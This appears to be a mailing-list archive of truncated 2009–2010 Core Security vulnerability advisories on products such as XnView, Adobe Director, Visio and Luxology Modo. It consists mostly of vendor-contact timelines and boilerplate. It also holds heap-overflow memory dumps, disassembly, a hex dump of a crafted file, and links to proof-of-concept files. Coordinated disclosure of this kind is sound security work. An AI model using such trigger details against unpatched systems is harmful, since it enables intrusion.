ious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) Licence: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxYb4AACgkQyNibggitWa2juACcDs20mlODxEt60A6IH2vTVeWS Hs0AnjldjfUIwiNNQSumvp/h8bEq7yXL =oYbV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0316 - Novell iManager Multiple Vulnerabilities
d of the day and this deadline should be considered as final. No reply received. . 2010-06-02: The advisory CORE-2010-0316 is published. . 2010-06-02: The iManager team notifies both bugs have been reproduced and they are going to develop fixes for both issues. The iMananger team also notifies it has not decided if they are going to issue patches for the vulnerable versions of iManager currently in use or will just roll out the fixes in the upcoming release of a new iManager version. . 2010-06-02: Core removes the advisory from its website and notifies that it was published for about 20 minutes. Core also notifies there will be a meeting of the Core Advisories Team in order to evaluate this case tomorrow (Thursday 3th) 19.30 GMT. If the iManager team does not mean to release patches then, there is not a good reason to postpone the advisory publication till Aug 2010. . 2010-06-03: The iManager team notifies the plan to release a 2.7.3 ftf4 to fix these 2 issues and another issue. iManager 2.7.3 ftf4 would be released before August, but there is no date yet. . 2010-06-03: Core agrees to postpone the advisory publication waiting for the 2.7.3 ftf4 release. The advisory is re-scheduled for publication to the Monday 21th June, 2010. Core notifies this date can be moved if the iManager team need it, but the iManager team should provide a clear report about the progress of the fixing process in order to request moving the release date. . 2010-06-15: Core requests a status update to the iManager team. . 2010-06-17: Core requests a status update to the iManager team and notifies the advisory will be released next Monday as planned. . 2010-06-18: The iManager team notifies they are waiting on a response from another Novell product that ships with iManager, to make sure they will also be able to consume the new version of iManager and release before August. The iManager team also notifies they will contact Core with the timeline today. . 2010-06-23: The advisory CORE-2010-0316 is published. 10. *References* [1] Novell iManager: [http://www.novell.com/products/consoles/imanager/overview.html]. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkwifQUACgkQyNibggitWa1meQCfX8hLENduIFbfOtEAh08CDEUb rJwAoIU+v/I4bPYp5f37zN5R/KKJ5ffB =OoGO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0514: XnView MBM Processing Heap Overflow
618 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 01355628 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 01355638 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 01355648 41 41 41 41 41 41 41 41 EE FE EE FE EE FE EE FE - -/ The error is the following: since it copies DWORDs, instead of copying 0x1E bytes, it should have copied 0x0F bytes (0x1E / 2). Finally, the heap block is allocated in this part of the code: /- 005AC5F756 PUSH ESI // Heap Size 005AC5F86A 08 PUSH 8// HEAP_ZERO_MEMORY 005AC5FAFF35 A4347900 PUSH DWORD PTR DS:[7934A4] // Heap 005AC600FF15 84726E00 CALL DWORD PTR DS:[<&KERNEL32.HeapAlloc>] ; ntdll.RtlAllocateHeap - -/ 9. *Report Timeline* . 2010-05-27: Core Security Technologies notifies XnView of the vulnerability. . 2010-05-27: The XnView author acknowledges receipt of the notification. . 2010-05-27: Core sends a technical description of the vulnerability, and a Proof-of-Concept file that triggers the bug. . 2010-05-28: The XnView author notifies Core that the vulnerability has been fixed, and that a fixed version will be released. . 2010-06-02: Core asks XnView when the fixed version will be released, in order to coordinate the publication of the advisory with the release of a fixed version. . 2010-06-03: The XnView author responds that version 1.97.5 will be available in 2 weeks. . 2010-06-03: Core requests a more precise date for the release, and reschedules publication of its advisory to June 14th, 2010. . 2010-06-07: The XnView author responds that the update will be available on June 14th. . 2010-06-10: Core sends a second Proof-of-Concept, and asks the XnView author if it triggers a different vulnerability. . 2010-06-11: The XnView author responds that the second PoC triggers the same vulnerability. . 2010-06-14: Advisory CORE-2010-0514 is published. 10. *References* [1] XnView website [http://www.xnview.com/] [2] Proof of Concept files [http://www.coresecurity.com/files/attachments/CORE-2010-0514-Xnview-PoCs.rar] [3] MBM file format [http://software.frodo.looijaard.name/psiconv/formats/MBM_File.html] [4] Basic elements: LListL [http://software.frodo.looijaard.name/psiconv/formats/Basic_Elements.html#LListL] [5] Paint Data Section [http://software.frodo.looijaard.name/psiconv/formats/Paint_Data_Section.html#Paint%20Data%20Section] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.14 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkwWj7IACgkQyNibggitWa1e5ACgo5+9x+0d52kMcG/W+SUMQBi2 654AoJ5SFLW+h9mSS84bHqpzqhxBwhB0 =HDp/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0415] SQL Injection in CubeCart PHP Free & Commercial Shopping Cart Application
ns to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkwOjp4ACgkQyNibggitWa1hBQCcDtxBPpLuaYzZ+ACai/qdR0a9 4jMAn3bBbwBMJVVB6YbSfx7fJb/2lOL8 =mQtV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies Advisories Errata: The vulnerability in advisory CORE-2010-0405 was incorrectly described as an Invalid read, when it is really a Memory corruption vulnerability. Updated Title: Adobe Director DIRAPI.DLL Memory Corruption Vulnerability Updated URL: http://www.coresecurity.com/content/adobe-director-memory-corruption -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkvsZboACgkQyNibggitWa20oQCgjqWZJeawrwtMs0E13rB4+veh F7MAn0WOo4rDimNR+jWhGErxrmjfK6U/ =iinS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read
B8 0012F5EC Arg2 = 0012F5EC 0012E6BC Arg3 = 0012E6C0 001A Arg4 = 001A 0012E6DC 2018BB23 Director.2018BB1E 0012E83C 2027E776 ? Director.2018BAB0 Director.2027E771 - -/ 9. *Report Timeline* . 2010-04-14: Vendor contacted. . 2010-04-14: Vendor requests PoC file. . 2010-04-14: Core replies with the PoC file and the draft advisory. . 2010-04-14: Adobe replies that will investigate the issue and sets a preliminary release date for June/July. . 2010-04-15: Core agrees with the preliminary release date. . 2010-04-28: Core requests an update on the situation, and asks whether Adobe was able to confirm if the bug is exploitable. . 2010-04-28: Adobe replies that the issue was investigated and is scheduled to be fixed in the next release of Adobe Shockwave Player, planned for May; they did not carry out further exploitability research. . 2010-04-28: Core requests a specific publication date for the fix. . 2010-05-06: Adobe informs Core that the release date for the fix has been set to May 11th. . 2010-05-07: Core asks Adobe if they want to provide the text for the "Solutions and Workarounds" section of the advisory. . 2010-05-07: Adobe replies with the text for the "Solutions and Workarounds" section of the advisory. . 2010-05-11: Advisory published. 10. *References* [1] Adobe Security Bulletin [http://www.adobe.com/go/apsb10-12/]. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkvptp4ACgkQyNibggitWa2lwACgo9oRhMUsmUe+IH3jdK9d7B+m ebMAn1iAO1mYBqXGrm67F2oCxTd+OEe3 =s6Ek -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0427] Windows SMTP Service DNS query Id vulnerabilities
, 2007. [http://www.trusteer.com/files/BIND_9_DNS_Cache_Poisoning.pdf] [7] Klein, Amit, "Windows DNS Server cache poisoning", 2007. [http://www.trusteer.com/files/Windows_DNS_Cache_Poisoning.pdf] [8] Kaminsky, Dan, "Black Ops 2008: It_s The End Of The Cache As We Know It ", 2008. [http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf] [9] Hubert, A., van Mook, R., "Measures for Making DNS More Resilient against Forged Answers", RFC-5452, 2009. [http://tools.ietf.org/html/rfc5452] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkvgnyEACgkQyNibggitWa2SyQCfdWpNuMmlU8Ye1eE0uSII5f+G mmwAnj4hejHo/gnLh8qF/EhHBJHvvijS =VxJA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0428] Microsoft Office Visio DXF File Insertion Buffer Overflow
ilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkvgbUoACgkQyNibggitWa3GTQCfT8WvlRzJ5JIs8aZV1YXoyGLB gQIAnRFEX6sGm6I5w+lCkxO642UzM0kf =++e0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0406 - User Invoices Persistent XSS Vulnerability in CactuShop
e reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkvPP5wACgkQyNibggitWa1yQgCgn+7/QWBsftCpgloXlQQMirnG jVAAoKs0PoyxVRtYCwzYyunWugg6grtl =E4Fs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0323: XSS Vulnerability in NextGEN Gallery Wordpress Plugin
the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAku7mowACgkQyNibggitWa3vfQCeP8eGzt/eGSrAREsNRfrGsaLs 8UEAnAuRs9cgmZkfeq1DU8BCNoxLgFFI =wL6j -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability
-vpc-poc.zip 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuf5fwACgkQyNibggitWa2IuwCeJitqH31/htKYFIuoeXVVbmmN lscAn1z+fpwqI7rbHnJbjRujiZ3mfJOJ =hgB9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-1103: Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability
03-09: The advisory CORE-2009-1103 is published. 10. *References* [1] Microsoft Security Bulletin MS10-017 http://www.microsoft.com/technet/security/Bulletin/MS10-017.mspx [2] MSDN DbOrParamQry entry http://msdn.microsoft.com/en-us/library/dd953289.aspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuWvzgACgkQyNibggitWa3sgQCfW9M7pPRWJ82ytbaY0V8rJh6W 3/4AmwQbyIyX8Lg2FPDrzetOCkgybb35 =HNzF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0813: Windows Movie Maker and Microsoft Producer IsValidWMToolsStream() Heap Overflow
ated version of advisory CORE-2009-0813 as requested by Microsoft. . 2010-03-09: Microsoft Security Bulletin MS10-016 [2] is released, which fixes the vulnerability in Movie Maker. . 2010-03-09: The advisory CORE-2009-0813 is published as user release. 10. *References* [1] About Core Security's Bugweek http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek [2] Microsoft Security Bulletin MS10-016 http://www.microsoft.com/technet/security/Bulletin/MS10-016.mspx 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuWvrcACgkQyNibggitWa1XQACeI3uhCN5nVjAjseSZpRh0R2Bn 0T4An2XAB94FkLyN0Pq5G3NWzOzM9Ibq =efAg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORRECTION: CORE-2009-0913 - Luxology Modo 401 .LXO Integer Overflow
52 00-40 00 00 00 or ? ?R @ 01B0: 47 00 3F 80-00 00 42 00-3F 80 00 00-43 48 4E 4C G ?Ç B ?Ç CHNL 01C0: 00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21 ?bughere ?pnx! - -/ 8. *Report Timeline* . 2009-11-06: Core completes the support form trying to reach a security contact . 2009-11-13: Luxology LLC support team doesn't respond any mail. Core contacts CERT tring to reach a valid security contact at Luxology LLC. . 2009-11-16: CERT acknowledge the comunication, and Core reschedule the advisory to November 30th, 2009 based on CERT recomendations. . 2010-03-01: No response from Luxology LLC. . 2010-03-02: The advisory CORE-2009-0913 is published. 9. *References* [1] The authors participated in Core Bugweek 2009 as members of the team "Gimbal Lock N Load". [2] http://www.luxology.com/modo/ [3] http://www.luxology.com/ [4] http://www.martinreddy.net/gfx/2d/IFF.txt 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkuOmH0ACgkQyNibggitWa2QNgCfXfVi/vYAPK2u3xIBbkZ9sgbK CqEAoK7tSDlCbk9E2kmlID8BLK8itBKD =pxSB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Luxology Modo 401 .LXO Integer Overflow
3F 80-00 00 42 00-3F 80 00 00-43 48 4E 4C G ?Ç B ?Ç CHNL 01C0: 00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21 ?bughere ?pnx! - -/ 8. *Report Timeline* . 2009-11-06: Core completes the support form trying to reach a security contact . 2009-11-13: Luxology LLC support team doesn't respond any mail. Core contacts CERT tring to reach a valid security contact at Luxology LLC. . 2009-11-16: CERT acknowledge the comunication, and Core reschedule the advisory to November 30th, 2009 based on CERT recomendations. . 2009-03-01: No response from Luxology LLC. . 2009-03-02: The advisory CORE-2009-0913 is published. 9. *References* [1] The authors participated in Core Bugweek 2009 as members of the team "Gimbal Lock N Load". [2] http://www.luxology.com/modo/ [3] http://www.luxology.com/ [4] http://www.martinreddy.net/gfx/2d/IFF.txt 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel 